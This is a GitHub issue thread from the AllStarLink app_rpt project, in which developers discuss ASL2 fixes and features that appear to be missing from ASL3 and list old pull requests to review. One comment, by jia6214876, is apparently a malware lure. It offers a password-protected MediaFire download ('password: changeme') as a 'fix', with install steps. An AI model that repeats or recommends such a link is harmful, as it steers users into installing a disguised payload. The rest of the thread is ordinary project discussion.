AllStarLink/app_rpt #393: Commits to ASL2.0 after Feb. 2021 are not present in ASL3

davidgsd, 2024-08-27:
It appears that none of the changes, fixes, or new features added to ASL2 in 2021-2023 are present in ASL3. See https://github.com/AllStarLink/Asterisk-Old/commits/master/  Can this actually be true?  Why would ASL3 development have started from 3 year-old ASL2 code?

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Allan-N, 2024-08-27:
While I can't comment on which source based was used for ASL3, nor what was or was not included, I am a bit confused by the "Asterisk-Old" repo link you referenced.  That repo looks to be the source for ASL 1.02.  The ASL2 repo is [ASL-Asterisk](https://github.com/AllStarLink/ASL-Asterisk).

More importantly, is there a specific change, fix, feature that was present in ASL2 that is missing in ASL3?

davidgsd, 2024-08-27:
Hi Allan, thanks for that clarification, I updated my above issue description.  Thanks, David

jxmx, 2024-08-28:
But you didn't answer the question. What important items are missing in the current app_rpt code that aren't present now? Work on modern app_rpt started before February 2023. If the parameter you mention is important to you, please prep a pull request against this project to implement the feature.

davidgsd, 2024-08-28:
When releasing a major new version of a FOSS project the admins should make it clear to the community what features/fixes/improvements (that others had contributed to the previous version) they intend to discard and why. If it's now my responsibility to go through all commits to ASL2 from 2022-23 and figure out which ones were discarded, I believe that very much goes against the intent and spirit of FOSS.

jxmx, 2024-08-28:
We'll have to try to gather up some people to help out and go review some of the commits to ASL-Asterisk that were feature changes rather than crash-fixes and the like. I wasn't part of the project in late 2022, but when the app_rpt code got forked, there was probably stuff accepted into ASL2's app_rpt code that maybe shouldn't have been or at least co-pulled into ASL3 as well. If you have some quick-hit items like the one you mentioned, that would be helpful.

InterLinked1, 2024-08-28:
> We'll have to try to gather up some people to help out and go review some of the commits to ASL-Asterisk that were feature changes rather than crash-fixes and the like. I wasn't part of the project [...]

I've only been involved with ASL3, so I don't have any firsthand knowledge of what else may have gone into ASL2. However, we'll probably want to go back to late 2021, when ASL2 code would have been used as a baseline.

jxmx, 2024-08-29:
From looking at the commits to ASL-Asterisk, the following appear to be feature-related items that need to be evaluated for continued utility in ASL3:

[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/86
[ ] https://github.com/AllStarLink/ASL-Asterisk/commit/24e794ff7270002cbf15282a11f45f778a3fe1b4
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/53
[ ] https://github.com/AllStarLink/ASL-Asterisk/commit/fcf3f9fc911a493b6ab7cdde1cfd0ef123140d73
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/19
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/34
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/37
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/31
[ ] https://github.com/AllStarLink/ASL-Asterisk/commit/24cdbdc0b235122a8cd8502a5bf7f749ba9c1c9b
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/22
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/12
[ ] https://github.com/AllStarLink/ASL-Asterisk/pull/11

Allan-N, 2024-09-23:
@KB4MDD and I have been looking over the ASL2 commits.  Some changes are already in (or not needed).  A few still need to be reviewed and a few need to be pulled into ASL3.  Stay tuned.

closed 2024-12-16 by Allan-N